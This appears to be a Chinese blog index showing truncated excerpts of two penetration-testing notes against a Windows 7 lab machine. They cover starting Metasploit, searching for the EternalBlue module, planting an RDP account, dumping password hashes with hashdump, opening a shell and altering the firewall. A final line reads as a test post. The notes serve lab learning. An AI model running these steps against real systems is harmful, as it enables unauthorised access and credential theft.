渗透测试笔记(二)
一、第二次启动msf 第二次启动msf可以直接使用msfconsole命令 1msfconsole 按上次的操作选用攻击工具进入meterpreter界面 二、植入账号密码 使用run post/windows/manage/enable_rdp USERNAME=liz PASSWORD=123456向目标机植入账号密码 1run post/windows/manage/enable_rdp USERNAME=liz PASSWORD=123456 此处因为已经植入过,所以会出现[-]报错 此时可以开另一个终端输入rdesktop + 目标主机ip,以此远程连接目标机桌面 1rdesktop <目标主机ip> 使用hashdump查询目标机所有加密后的账号密码,这里需要找到我们自己添加的那个账号的密码 1hashdump 三、进入shell获取进一步权限 输入shell获取目标机权限(相当于在终端骇入目标机) 1shell 乱码可以输入:chcp 65001解决乱码 1chcp 65001 并输入netsh firewall add...
渗透测试笔记(一)
一、开启终端 右键桌面,在桌面打开终端 (Open Terminal Here) 首先以管理员root进行操作:sudo su root (sudo: superuser do su: switch user) 1sudo su root 二、检查WIN7虚拟机ip 在另一台具有漏洞的win7系统虚拟机上查看ip:ipconfig 1ipconfig 记住这台虚拟机的ip地址,一会要用 注:这台机器的防火墙已关闭 三、启动msf 打开msf (Metasploit Framework),初次启动用msfdb run指令打开其数据库 1msfdb run 四、搜索永恒之蓝代号查找工具 搜索“ms17-010”,即永恒之蓝的代号,用search ms17-010即可 1search...
不要回答!不要回答!不要回答!
只是小小测试而已